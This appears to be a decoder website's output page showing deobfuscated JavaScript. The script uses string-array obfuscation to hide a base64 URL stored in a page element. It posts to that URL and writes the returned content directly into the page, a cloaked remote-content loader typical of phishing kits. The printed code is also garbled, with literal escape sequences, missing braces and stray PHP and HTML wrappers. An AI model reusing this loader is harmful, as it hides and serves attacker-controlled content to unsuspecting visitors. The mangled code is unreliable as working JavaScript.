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PHP Decode
Decoded Output download
<? "></input>\xd
function _0x5156() {\xd\xa var _0x1ba6df = [
\xa '1424yjGnir',
\xa 'script',\xd
\xa 'write',\xd\xa 'concat',
\xa '#b64u',\xd\xa '6NgSynG',\xd\xa 'createElement',\xd\xa '1262822DDWGRY',
\xa 'val',\xd\xa '13LXmqSw',
\xa 'aHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuMS4xLm1pbi5qcw==',\xd
'218645uVIcwf',\xd\xa 'post',\xd
'573MqlYBN',\xd\xa '5368800DTnugB',
\xa '39vDOadZ',
\xa 'scte=',
\xa '40vkjOzH'\xd\xa ];
_0x5156 = function () {\xd\xa return _0x1ba6df;
\xa return _0x5156();
\xa}\xd\xafunction _0x5294(_0x958943, _0x1d06eb) {\xd\xa var _0x515663 = _0x5156();
\xa return _0x5294 = function (_0x52942f, _0x81e5e0) {\xd\xa _0x52942f = _0x52942f - 0xa5;\xd\xa var _0x4ecd51 = _0x515663[_0x52942f];
\xa return _0x4ecd51;
}, _0x5294(_0x958943, _0x1d06eb);\xd
var _0x5b5acb = _0x5294;
\xa(function (_0x280e7b, _0xd34bd2) {
\xa var _0x2c3a6e = _0x5294, _0x3e349e = _0x280e7b();\xd
while (!![]) {\xd
try {
\xa var _0x231f49 = -parseInt(_0x2c3a6e(0xb4)) / 0x1 * (-parseInt(_0x2c3a6e(0xb2)) / 0x2) + parseInt(_0x2c3a6e(0xba)) / 0x3 * (-parseInt(_0x2c3a6e(0xa8)) / 0x4) + -parseInt(_0x2c3a6e(0xaa)) / 0x5 * (-parseInt(_0x2c3a6e(0xae)) / 0x6) + parseInt(_0x2c3a6e(0xb8)) / 0x7 * (parseInt(_0x2c3a6e(0xa6)) / 0x8) + parseInt(_0x2c3a6e(0xb6)) / 0x9 + parseInt(_0x2c3a6e(0xbc)) / 0xa * (parseInt(_0x2c3a6e(0xb0)) / 0xb) + -parseInt(_0x2c3a6e(0xbb)) / 0xc * (parseInt(_0x2c3a6e(0xbe)) / 0xd);\xd
if (_0x231f49 === _0xd34bd2)
\xa break;
\xa else
\xa _0x3e349e['push'](_0x3e349e['shift']());
} catch (_0x10873a) {
\xa }\xd
}(_0x5156, 0x6b219));\xd\xavar scr = document[_0x5b5acb(0xaf)](_0x5b5acb(0xa9)), stc = _0x5b5acb(0xb5);
scr['setAttribute'](_0x5b5acb(0xbd), atob(stc)), document[_0x5b5acb(0xb7)][_0x5b5acb(0xa7)](scr), scr['onload'] = function () {\xd\xa var _0x5d443a = _0x5b5acb;
\xa $['support'][_0x5d443a(0xb1)] = !![];
\xa var _0x41820d = atob($(_0x5d443a(0xad))[_0x5d443a(0xb3)]());
\xa $[_0x5d443a(0xb9)](_0x41820d, _0x5d443a(0xa5)[_0x5d443a(0xac)](''), function (_0x1197a5) {
\xa var _0x2154b0 = _0x5d443a;\xd\xa _0x1197a5 == 'no' ? document['write']('<h1>Please Get an api key to use this page</h1>') : document[_0x2154b0(0xab)](_0x1197a5);\xd
</html> ?>
Did this file decode correctly?
Original Code
Function Calls
None |
MD5 | d4daa8a408bbaa766177844bd12f5095 |
Eval Count | 0 |
Decode Time | 47 ms |